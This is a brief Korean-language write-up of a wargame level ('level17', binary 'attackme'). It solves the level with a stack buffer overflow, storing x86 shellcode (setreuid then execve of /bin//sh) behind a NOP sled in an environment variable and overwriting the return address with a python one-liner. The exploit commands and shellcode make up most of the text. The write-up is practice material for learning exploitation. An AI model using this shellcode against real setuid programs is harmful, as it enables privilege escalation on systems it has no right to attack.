SMALL
level17 // king poetic
16번과 다르게 "/bash/sh" 가 없다. 그렇다면 환경변수를 이용해 공격해보자고 생각했다.
SH의 페이로드는 다음과 같다.
export SH=`python -c 'print "\x90"*100+"\x31\xc0\x31\xdb\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
등록한 후 주소를 알아 보았다.
little endian : \x5f\xfe\xff\xbf
(python -c 'print "\x90"*40+"\x5f\xfe\xff\xbf"';cat)|./attackme
정답!